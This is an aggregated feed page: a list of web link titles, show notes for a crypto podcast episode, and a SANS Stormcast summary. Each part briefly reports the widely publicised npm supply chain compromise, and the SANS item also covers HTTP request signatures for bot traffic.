Storybook: Frontend workshop for UI development
Largest NPM Compromise in History - Supply Chain Attack : r/programming
We all dodged a bullet - Xe Iaso
Post by @cabel.panic.com — Bluesky
Special: One on One with a Hacker – ShopTalk
1Password Watchtower
This 25-minute video is the most riveting sudoku puzzle you will ever watch | The Verge
Many years on the job and I still don't get it. - daverupert.com
if() - CSS | MDN
CSS at-rule functions - CSS | MDN
CSS color-scheme-dependent colors with light-dark() – Bram.us
Matthias Ott
The crypto community once again is dodging digital landmines as Ledger's CTO screams "stop those onchain transactions!" thanks to a sneaky NPM supply chain attack hitting over a billion downloads. That's right, hackers are out here snatching crypto like it's candy. Meanwhile, Bitcoin Hyper's presale is going full supernova, Oracle's AI cloud dreams are spiking their stock, and Trump Media is hoarding $6 billion in CRO tokens for Truth Social's big flex. From Nasdaq's $50M Gemini IPO bet to Worldcoin's AI identity takeover, we're unpacking it all with our signature badness. Grab your hardware wallet, strap in, or strap on if you are into that kind of thing, and jump on board for our bad news episode #789 of The Bad Crypto Podcast.
Full Show Notes at: http://badco.in/789
SUBSCRIBE, RATE, & REVIEW: Apple Podcast: http://badco.in/itunes Google Podcasts: http://badco.in/google Spotify: http://badco.in/spotify Amazon Music: http://badco.in/amazon
FREE NFTs when you JOIN THE BAD CRYPTO NIFTY CLUB at https://badcrypto.uncut.network
FOLLOW US ON SOCIAL MEDIA: Twitter: @badcryptopod - @joelcomm - @teedubya Facebook: /BadCrypto - /JoelComm - /teedubyaw Facebook Mastermind Group: /BadCrypto LinkedIn: /in/joelcomm - /in/teedubya Instagram: @BadCryptoPodcast Email: badcryptopodcast[at]gmail[dot]com Phone: SEVEN-OH-8-88FIVE- 90THIRTY
DISCLAIMER: Do your own due diligence and research. Joel Comm and Travis Wright are NOT FINANCIAL ADVISORS. We are sharing our journey with you as we learn more about this crazy little thing called cryptocurrency. We make NO RECOMMENDATIONS. Don't take anything we say as gospel. Do not come to our homes with pitchforks because you lost money by listening to us. We only share with you what we are learning and what we are investing in. We will never "pump or dump" any cryptocurrencies. Take what we say with a grain of salt. You must research this stuff on your own! Just know that we will always strive for RADICAL TRANSPARENCY with any show associations.
Support the show: https://badcryptopodcast.com
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Major npm compromise: A number of high-profile npm libraries were compromised after developers fell for a phishing email. This compromise affected libraries with a total of hundreds of millions of downloads a week. https://bsky.app/profile/bad-at-computer.bsky.social/post/3lydioq5swk2y https://github.com/orgs/community/discussions/172738 https://github.com/chalk/chalk/issues/656#issuecomment-3266894253 https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised
HTTP Request Signatures: It looks like some search engines and AI bots are starting to use HTTP request signatures. This should make it easier to identify bot traffic. https://isc.sans.edu/diary/HTTP%20Request%20Signatures/32266